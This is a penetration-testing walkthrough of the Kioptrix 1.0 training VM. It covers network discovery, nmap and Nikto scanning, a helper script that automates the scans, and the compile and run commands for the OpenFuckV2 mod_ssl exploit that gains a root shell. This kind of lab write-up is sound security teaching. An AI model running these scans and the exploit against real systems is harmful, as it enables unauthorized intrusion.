Kioptrix 1.0 (Level 1) Walkthrough

Introduction

Today we're going to do a boot2root pentest walkthrough of the Kioptrix 1.0 (Level 1) machine created by the Kioptrix team and hosted at https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ .

For this pentest we'll be using two virtual machines, a Kali Linux machine as our attacking system, and the Kioptrix 1.0 machine as our target system.

Locating the Target

After booting up both machines, the first thing we need to do is locate the target on the network. We can do that from the attacking system with netdiscover, which finds hosts by ARP and so only sees systems on the same local segment as Kali (here the 10.0.2.0/24 host-only network).

netdiscover -r 10.0.2.0/24


Our target system's IP address is 10.0.2.5.

Scanning and Enumeration

We can determine open ports on the target with nmap.

nmap -T4 -p- 10.0.2.5


Six TCP ports are open: 22, 80, 111, 139, 443 and 32768. Rather than re-scan everything, we feed just those ports into a second, more aggressive nmap scan (-A enables version detection, the default NSE scripts, OS detection and traceroute), which is where the service banners come from.

nmap -T4 -A -p22,80,111,139,443,32768 10.0.2.5
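
The two-stage scan above (sweep every port, then fingerprint only the open ones) is easy to script so the port list never has to be retyped. The shell script below is an added example and not part of the original walkthrough: it parses nmap's greppable output (-oG), keeps only the ports reported as open/tcp, and builds the follow-up -A command. The sample scan output embedded in it is constructed to match the ports found above (with one filtered port added to show the state filter), and the scan_target function, which actually runs nmap, is only invoked when a host is passed on the command line.

```shell
#!/bin/sh
# Added example: automate the two-stage nmap workflow used in the walkthrough.
# Stage 1: nmap -T4 -p- -oG -        (full TCP sweep, greppable output)
# Stage 2: nmap -T4 -A -p<open> host (version/script/OS scan of the open ports only)

# Constructed sample of stage-1 greppable output for the Kioptrix host.
# This is not real scan output; port 25/filtered is included only to show that
# non-open entries are dropped.
sample_gnmap() {
    printf '%s\n' '# Nmap scan initiated as: nmap -T4 -p- -oG - 10.0.2.5'
    printf 'Host: 10.0.2.5 ()\tStatus: Up\n'
    printf 'Host: 10.0.2.5 ()\tPorts: 22/open/tcp//ssh///, 25/filtered/tcp//smtp///, 80/open/tcp//http///, 111/open/tcp//rpcbind///, 139/open/tcp//netbios-ssn///, 443/open/tcp//https///, 32768/open/tcp//filenet-tms///\tIgnored State: closed (65528)\n'
    printf '%s\n' '# Nmap done -- 1 IP address (1 host up) scanned'
}

# Read -oG output on stdin and print the open TCP ports as "22,80,443"
# (numerically sorted, no trailing comma). The -oG fields are tab separated and
# each port entry is port/state/protocol/owner/service/rpcinfo/version/.
open_ports_from_gnmap() {
    awk -F'\t' '
        /^Host:/ {
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^Ports: /) {
                    sub(/^Ports: /, "", $i)
                    n = split($i, entries, /, */)
                    for (j = 1; j <= n; j++) {
                        split(entries[j], f, "/")
                        if (f[2] == "open" && f[3] == "tcp") print f[1]
                    }
                }
            }
        }' | sort -n | tr '\n' ',' | sed 's/,$//'
}

# Print the stage-2 command for a host and a comma-separated port list.
service_scan_cmd() {
    printf 'nmap -T4 -A -p%s %s\n' "$2" "$1"
}

# Run both stages for real against a host (needs nmap; -A wants root for OS detection).
scan_target() {
    host=$1
    ports=$(nmap -T4 -p- -oG - "$host" | open_ports_from_gnmap)
    if [ -z "$ports" ]; then
        echo "no open TCP ports found on $host" >&2
        return 1
    fi
    echo "open ports: $ports" >&2
    service_scan_cmd "$host" "$ports" >&2
    nmap -T4 -A -p"$ports" "$host"
}

# With a host argument: scan it. Without one: demonstrate on the constructed sample.
if [ -n "${1-}" ]; then
    scan_target "$1"
else
    ports=$(sample_gnmap | open_ports_from_gnmap)
    echo "open ports from sample: $ports"
    service_scan_cmd 10.0.2.5 "$ports"
fi
```

Run it as `sh scan.sh 10.0.2.5` on Kali to reproduce both scans; with no argument it only parses the embedded sample and prints the stage-2 command it would run.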


One notable finding is that HTTPS is running on port 443, served by the same Apache instance as port 80; the version detection output also gives us the Apache and mod_ssl banner, which is worth noting before we go any further. Next we run Nikto against the web server. Nikto scans port 80 by default (add -p 443 to cover the HTTPS listener), but the Server header Apache returns on port 80 already advertises the mod_ssl module version, so the finding below shows up either way.

nikto -h 10.0.2.5


Nikto flags the target's mod_ssl version as one of the releases (2.8.7 and lower) vulnerable to a remote buffer overflow that may yield a remote shell, and cites CVE-2002-0082 for it. Searching for that issue turns up this exploit on exploit-db.com (OpenFuckV2.c, an updated build of the original OpenFuck exploit):

https://www.exploit-db.com/exploits/47080


Finding a Way In / Privilege Escalation

According to the exploit's header comments, a successful run opens a shell on the target with root privileges, which is why the "Finding a Way In" and "Privilege Escalation" steps collapse into one here. Reading the source shows how: the overflow itself lands a shell as the Apache user, and the exploit then uses wget on the target to fetch and compile a local ptrace/kmod kernel exploit to get root, so the target VM needs outbound internet access for that second stage. That sounds pretty good, so let's use it. The first step is to download the exploit source (47080.c) from the exploit-db page.


The build instructions are in the same header comments. We need to install libssl-dev, then compile the exploit with gcc, linking against libcrypto.

cd /root/Downloads/
apt-get install libssl-dev
gcc -o OpenFuck 47080.c -lcrypto


Now to run the exploit. Running OpenFuck with no arguments prints its usage and a numbered list of target offsets; we pick the entry matching the Apache build nmap reported (0x6b), supply the target's IP and port, and add -c 50 so the exploit opens 50 connections before sending the shellcode (the default is lower, and raising it is the usual fix if the first attempt fails). We then check who we are in the returned shell.

./OpenFuck
./OpenFuck 0x6b 10.0.2.5 443 -c 50
whoami


The exploit worked and opened a root shell for us. A quick look in /root for a flag file turns up nothing, but the Kioptrix login banner states that the goal is root access and doesn't mention a flag, so we'll call this one done.

Summary

After our initial scans, we found that the mod_ssl module of the Apache server on port 443 of the target was vulnerable to a remote buffer overflow (the mod_ssl 2.8.7-and-lower issue flagged by Nikto). Exploiting it with OpenFuckV2 gave us a remote shell on the target, which the exploit's second stage escalated to root.

Finish